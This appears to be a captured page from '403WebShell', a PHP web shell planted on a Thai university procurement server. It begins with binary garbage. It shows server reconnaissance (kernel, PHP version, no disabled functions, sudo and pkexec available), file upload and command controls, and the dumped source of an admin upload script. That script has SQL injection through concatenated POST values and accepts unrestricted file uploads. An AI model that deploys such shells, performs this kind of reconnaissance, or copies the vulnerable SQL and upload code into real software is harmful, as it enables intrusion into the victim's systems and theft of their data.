h(  ) ($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms����Sb�,;R''6c2I�!\����kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K����x)1�6@r*2�89ma��&��'ti������{~#������t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1����w�r��l&-t*3�<<�u��#����j&.u��J68\8?"#$%&'()*+,-./0 ! 
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell
403Webshell
Server IP : 10.254.12.21  /  Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/arit/procurement/pages/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/html/arit/procurement/pages/admin/file_add_db.php
<?ob_start();?>
<?php include 'check_mode_admin.php';?>
<?php include '../dbconnect.php';?>
<?php
if ($_POST["submit"])
{
  if ($_FILES["file_name"]["name"])
  {
	if ($_POST["procurement_id"])
	{
		$procurement_id=$_POST['procurement_id'];
		$strKeyword=$_POST['txtKeyword'];
		$page=$_POST['Page'];	
		
		$sql = "SELECT * FROM procurement_file WHERE procurement_id=" . $procurement_id . " ORDER BY file_order DESC";
		$query = mysqli_query($conn,$sql);
		if($result=mysqli_fetch_array($query,MYSQLI_ASSOC))
		{
			$file_order = $result["file_order"]+1;
		}
		else
		{
			$file_order = 1;
		}
		
		if ($_FILES["file_name"]["name"])
		{
			$file_path = $_FILES["file_name"]["name"];
		}
		else
		{
			$file_path = "";
		}


		$sql = "INSERT INTO procurement_file ";
		$sql .="(file_title,file_name,procurement_id,file_order) ";
		$sql .="VALUES ";
		$sql .="('". $_POST["file_title"] . "' ";
		$sql .=",'" . $file_path . "' ";	
		$sql .="," . $procurement_id . " ";
		$sql .="," . $file_order . ") ";
		
		$query = mysqli_query($conn,$sql);
		
		if($query)
		{
			$image_folder = "../file/" . $procurement_id ;
			if (!(file_exists($image_folder)))
			{
				mkdir($image_folder , 0755);
			}		
			//upload file
			if(move_uploaded_file($_FILES["file_name"]["tmp_name"], $image_folder . "/" . $_FILES["file_name"]["name"]))
			{
				echo "บันทึกไฟล์เรียบร้อยแล้ว<BR>";
			}
			else  
			{
				echo "ไม่สามารถบันทึกไฟล์ได้<BR>";
			}		
					
			$redirect_url = "procurement_detail.php?procurement_id=" . $procurement_id;
			if ($strKeyword<>"")
			{
				$redirect_url .= "&txtKeyword=" . $strKeyword;
			}
			if ($page<>"")
			{
				$redirect_url .= "&Page=" . $page;
			}				
			header("location:$redirect_url");
		}
		else
		{
			echo "ไม่สามารถบันทึกข้อมูลได้";
		}		

	}
	else 
	{
		echo "ไม่พบรายการที่เลือก<BR>";
	}
  }  //if ($_FILES["file_name"]["name"])
  else //if ($_FILES["file_name"]["name"])
  {
  	echo "ไม่ได้เลือกไฟล์";
  }//if ($_FILES["file_name"]["name"])
} //if ($_POST["submit"])
?>

Youez - 2016 - github.com/yon3zu
LinuXploit